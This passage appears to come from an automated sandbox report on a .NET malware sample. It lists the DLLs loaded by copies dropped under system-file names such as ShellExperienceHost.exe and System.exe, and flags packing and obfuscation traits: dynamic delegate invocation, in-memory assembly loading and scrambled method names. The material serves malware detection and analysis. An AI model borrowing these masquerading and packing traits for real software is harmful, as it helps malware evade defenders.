Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: policymanager.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: msvcp110_win.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: winhttp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wintypes.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: appresolver.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: bcp47langs.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: slc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sppc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: apphelp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: apphelp.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: 4KjLUaW30K.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4KjLUaW30K.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4KjLUaW30K.exe Static file information: File size 1444352 > 1048576
Source: 4KjLUaW30K.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15d000
Source: 4KjLUaW30K.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B System.AppDomain.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B System.Reflection.Assembly.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F1DFD3 push edi; retf 22_2_00007FF848F1DFD6
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F400BD pushad ; iretd 27_2_00007FF848F400C1
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F3DFD3 push edi; retf 29_2_00007FF848F3DFD6
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F2DFD3 push edi; retf 30_2_00007FF848F2DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F4DFD3 push edi; retf 31_2_00007FF848F4DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F400BD pushad ; iretd 31_2_00007FF848F400C1
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F3DFD3 push edi; retf 32_2_00007FF848F3DFD6
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F1DFD3 push edi; retf 33_2_00007FF848F1DFD6
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F1DFD3 push edi; retf 34_2_00007FF848F1DFD6
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F0DFD3 push edi; retf 37_2_00007FF848F0DFD6
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F2DFD3 push edi; retf 38_2_00007FF848F2DFD6
Source: 4KjLUaW30K.exe Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: ShellExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: dllhost.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: 4KjLUaW30K.exe, RdFx8MhwHpIAqTDYA0b.cs High entropy of concatenated method names: 's6hEYjr3KF', 'xtoEARS230', 'xR5ED9lf8y', 'OY8EpoCMg6', 'R1S8IQX2743AD59twGm', 'RkUe4uXIOO2ZObmsKrs', 'QmbaBDXUw4g8967vNql', 'JyFA64XqAuaw9fxJIGc', 'WQ0JaiX388YDRhMxKpr', 'IyT5sUXxMkP1hxBh3dd'
Source: 4KjLUaW30K.exe, pssBONvokLUj0rPrGVt.cs High entropy of concatenated method names: 'KhuIUeyvPV', 'qpAWNFQMTNVMlCJxhHE', 'OKMk4dQSpnwo72GtuAv', 'NOXMFRQsaH8KVZUYqft', 'DS3YBqQiIVkGymTvOI7', 'Tg0V5lCapQ', 'ytjVfLPMRZ', 'zBFV7ipDGv', 'rsbVt7DWx2', 'UAjVjReXSq'
Source: 4KjLUaW30K.exe, csVbO1bXkGVq46Zd3v.cs High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'MRKPVjJD7tIAgUraewD', 'h1maHZJAp7vetARPU0g', 'RRtQX1JZ3IyRWXP0gj6', 'uOE0eaJpg6IkdLkDQ6t', 'WknsxLJY5mLcTCVNmsB', 'sa0iqmJjbrBkEfb0V40'
Source: 4KjLUaW30K.exe, zRjdRcY0uBStDt7cu06.cs High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'kjV1L2d6nwpZN2gKpRe', 'LIvUBUdB61AO7X8DWVl', 'qCbhFRdCiQMIBlWqSjd', 'aqkTvldF7uafyLO15hB', 'lQfB7TdO66ckhYMBJrn', 's93fhJdzIjpIJJb3L14'
Source: 4KjLUaW30K.exe, jXbpxlNym9gDouik4Mu.cs High entropy of concatenated method names: 'hGpnJhNB6F', 'TOgnLTqxfJ', 'MfHnCfMuft', 'W2FnBPNH82', 'SrenoTYt2Y', 'R71jg9atrhFRAF4PcZD', 'VL0xE6awLSB9AX6LQeg', 'ePgAPbjOvHA4W4tAFNa', 'zbPCMojz2ffkcKtGyaT', 'DrqMXracC3Bc9gOe36n'
Source: 4KjLUaW30K.exe, EYxmENNgMAgigIOyy5j.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', 'JahHjGZEdX', 'BRxHFSLv6P', 'C5xH28FjEA', 'HF1HRJ4WqB', 'iecHhjReok', 'ArmrUcifIShYjtDNidP', 'h2Ju90ig515xauXeLux', 'vkaoKXiuSp40XcIyYBC'
Source: 4KjLUaW30K.exe, t1FOf5u5vSxA9rNE92.cs High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'oV0G4hJiXbUioC6AaBj', 'VysoBpJMbeJTyMkJe2b', 'dvCi8bJSBhPaPf0PCt4', 'xq3A4oJefoyNaRbDIsQ', 'GM74WSJXl3Hhfj1B2uv', 'zJU4nCJWgJxiJnYjlli'
Source: 4KjLUaW30K.exe, UoSFo1hu4DGVNe1MMSI.cs High entropy of concatenated method names: '_5u9', 'NEU7niFAuN', 'UGZV6JvKrq', 'Jhh7H1kqwK', 'pypW4ikCD1OtijrH5cm', 'Op0iZskFZ8YG8AcIR1X', 'n0DD4ZkO4MlIYoBSsFr', 'GgNmfDk6PokSxiKouCh', 'bSCVASkBaqqEkZr0FKi', 'ya1i2SkzDNtkUQhjARl'
Source: 4KjLUaW30K.exe, q9i24FYAk4joCprBGEq.cs High entropy of concatenated method names: 'TA7mavaTcS', 'MNnRkuAdCJbjwIj8bLg', 'GbNdL2AuyTYNGQhEVIW', 'MkGjb7AJmhGZc1YsxJR', 'R6MkXNATrKDlhaDG9ST', 'xVt9ZwA4qBCCto35HuT', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs High entropy of concatenated method names: 'gmNG9PymMnmFGkUZHJF', 'hymh89yrHeBMAb3sclK', 'jflbevyGlC2hRs3LytW', 'XuWAiFyQF2Wk5evRrI7', 'CbAf12eDK4', 'halXaMyHYJV6fsDjCjr', 'QqTKBky7p1m3yCWmsq7', 'tAVBpnyqqWigHDOrbHv', 'li7F3qy3QB5NKTItwHZ', 'eXhbbAy2PAUcXSCX8DG'
Source: 4KjLUaW30K.exe, iVQJa2oxSIa1fZwxjyW.cs High entropy of concatenated method names: 'imuolNufV2', 'JsuoJlH6j6', 'YqAL9dU03ppiJR8RkgC', 'IAZvXZU64ghP5nHrA4D', 'ACfcZnUBXeLQLUl2LGP', 'EUvBKCUCmy3kQclFBNw', 'vqKjmcUFCjo6WkshEeM', 'Kwovn8UOGqNoAL3ti0B', 'ODwtAGUz5j00bBNvyFV', 'xYbwITxtlilNr6T5Eru'
Source: 4KjLUaW30K.exe, sXO9vehYHvkDjwvGIbG.cs High entropy of concatenated method names: 'zep4kVisfq', 'SSL45KGvgV', 'eNp4foYpfA', 'wiE47lj0ql', 'QQVXMdMz6WwAvIMTnrO', 'lpLAGYMFOff0oR64PWv', 'tviTYKMOtCVyOxwEs6i', 'fKicVWStiCQo07KuEVa', 'mrIxr7SwVssxNG3l6ym', 'mlTi3xSceqVMKqDNgUH'
Source: 4KjLUaW30K.exe, uLcP3aYciqMSyYeGRgx.cs High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fqx2J74IVaFG1bBou0R', 'UTmIPB4Uuayfd6pL5fu', 'eteWqi4xhi8MAmQdp5O', 'r5u3CQ4LloCdGAXI2Zu', 'cuuGK74oNiD686rYj0K', 'vyg1T34EMRVUN8QVYJy'
Source: 4KjLUaW30K.exe, mvgFL5Y6b0QUuoeLoPK.cs High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jKokbJDX0dio5ZHLco3', 'ayT4q6DWo0kL6dteHUP', 'TgjdmDDkLcCH5mh4RGk', 'DCePQaDbkQHuWXb4bR7', 'eVyhfCDGlbw5cvhQBLF', 'dbyG9pDQ2dSYhng056V'
Source: 4KjLUaW30K.exe, YorUUdVOrRKdGCl9Uta.cs High entropy of concatenated method names: 'pU1Plsm8fR', 'VpmPJMcbdV', 'OKuPLNXJIU', 'dvfPCnDpiN', 'OsSPB5Ko3N', 'tHVutEECoMuPOfBJkIZ', 'rvTSs0EFTYC9kw012pB', 'j7OnaUEOSW0y5fNCCGb', 'EA4JfvEz9vHmkcdXb97', 'SAfnhDvtSqUexwBSnip'
Source: 4KjLUaW30K.exe, IVQrXTYdhw2b6IuNnmW.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'njXy3buNOAQm0GIfyuA', 'XjEL5Gu0QuuIoWa3G8v', 'UUBHJ8u6l3HIcE2SJ5I', 'JOUwOtuB5gRnsQt0PKA', 'WAZslZuCr8RiyxDDVf1', 'uw6UgKuFy3sQ93Xrxbp'
Source: 4KjLUaW30K.exe, wx5AJ09t2ek3FMHXjn.cs High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'OY31nSTjxGuJPHaVgsE', 'uRfrpUTaV5A5oZ4Jmmk', 'HGNgpBTs3bDZLnUltx1', 'CX5Mf7TiZ8857rHPeqC', 'ehI9bWTMmAlJvvBLh0j', 'ijHEOXTSpK208TuIRcH'
Source: 4KjLUaW30K.exe, b1bLN1hdsT4GQl0AsQ6.cs High entropy of concatenated method names: 'p10Eg1rJQS', 'tJkEqdfdxG', 'e2lEXHGdPM', 'oOR32vXy7Vf8OPoseDD', 'OegrjLXRaWPEBF1WV8t', 'cDK7VrX5Cd0gvRvHdOP', 'Jw95B1XlEoSTDSPGwex', 'RQCCOeXPIVXAOJxaYgH', 'qsmTpUXnCG5k4y2eH57', 'G3j2qkXNDEWgrVabLc6'
Source: 4KjLUaW30K.exe, aaHxfKot3wBhAtbghOZ.cs High entropy of concatenated method names: 'rRZoh0N8cd', 'hAKouWOWH3', 'c5Po9NfTpx', 'WHWoxEhxDl', 'Af7oYPlEs5', 'GkBkvGx1ilbiPh6Za2E', 'kBiwM3xmugAUuptZVwT', 'Uj8T3axrUk7iBPjwQ9u', 'QXREoSx95SQOWLfIhgT', 'j9SWKDxHEC0XAsiBopW'
Source: 4KjLUaW30K.exe, LvpXsezbnH0kVtox77.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'PrVY0HdKNrZHKtBBZRv', 'VcxrBDdJG8U7fmWfaP3', 'Kprfl5dTtk0eii8aFcZ', 'rOPm1Edd9DrgxjY9qte', 'NvXo7tduF94uvs3oXKO', 'F5t46Qd4NZMb87h32DV'
Source: 4KjLUaW30K.exe, kaFj5ehAhn7SApeLRJ6.cs High entropy of concatenated method names: 'Cmg8nxGxDeNA5gtByZk', 'zrXo8uGLueKRehjBFs8', 'xFvrGXGIkGmEmIdF9bg', 'm5yE4wGU2QsN82pxobq', 'IWF', 'j72', 'aAoVUJsid1', 'JSlVMPcEMQ', 'j4z', 'BbMVGQhrb2'
Source: 4KjLUaW30K.exe, WrALtDVt1SeisN1My3e.cs High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 4KjLUaW30K.exe, gbwyYgv3ti61ctQdP1F.cs High entropy of concatenated method names: 'jwU1iyyeWU', 'Ecb1jgIZir', 'wj01Fn0kf1', 'gRk121SBxq', 'HD51RHXiry', 'jRV1hqnWed', 'FMh1urlpUg', 'IOt191h7kF', 'TRA1x14iKK', 'bxa1YkvaF5'
Source: 4KjLUaW30K.exe, f2VANrYn2uMOLmfKVWn.cs High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'Ocyg68fUPlO6yC0bKZu', 'ngC4agfxdRNQ1XEG04b', 'iowKKXfLSlS3CZybEiZ', 'lGCJyAfojgQMJmVMxvN', 'QmtckBfEnZ3jB5lssPa', 'AZfBFefvtxkNh27qTgf'
Source: 4KjLUaW30K.exe, WNWwPKYOQJBxvHSPw4u.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'CZxHBY4Gbap1FN1Nlia', 'CyqZHF4QQBoO93GUYQ9', 'M9URAJ4mPcVOC6ssqJI', 'y6kWF94r7NTKgiRTIRG', 'ErekOM414qAISmKZG8E', 'G5Dl2k49TnBvv65jtPG'
Source: 4KjLUaW30K.exe, SiFU3k08VVtuEJmLFC3.cs High entropy of concatenated method names: 'hbVieLDDgps8g', 'cu1wMYyjuQC4SUcDc53', 'Kn65TLya3mpm34nWRea', 'mWV9e3ys8XVgdXL7coJ', 'NSj3wLyinCS73QCTwsv', 'dG5yMiyMRqJeMuCuMGq', 'hh7j1nypsxud7PVOXxc', 'EkCBJ8yYHtIreOHbXZm', 'xKv2MgySm0bGtLFfDbA', 'heXqWfye7Sp6gq9ApoJ'
Source: 4KjLUaW30K.exe, kIcqdXYoQ1J3IyjUpbB.cs High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'lMcAJydyV7OwKeIqtrU', 'lnxPpjdRTjp1tP0PyEw', 'J2ALYid52O13p5HjTSY', 'b8woPMdlgSFnM3uYOXE', 'L4aibndPhkRkvssXrN9', 'HrXTLcdnRk4ECFYd1Pn'
Source: 4KjLUaW30K.exe, skUQt8oHJIg7GoYYbNA.cs High entropy of concatenated method names: 'vMKdnFEJx2', 'zJfdH4PuR6', 'kjFdQydwAo', 'xWjd4l4Kaw', 'wYSdElwWFv', 'wGgdrath5X', 'csrdVU7GI4', 'kdld3hwK6D', 'vmYdIG14mV', 'qSed0S482R'
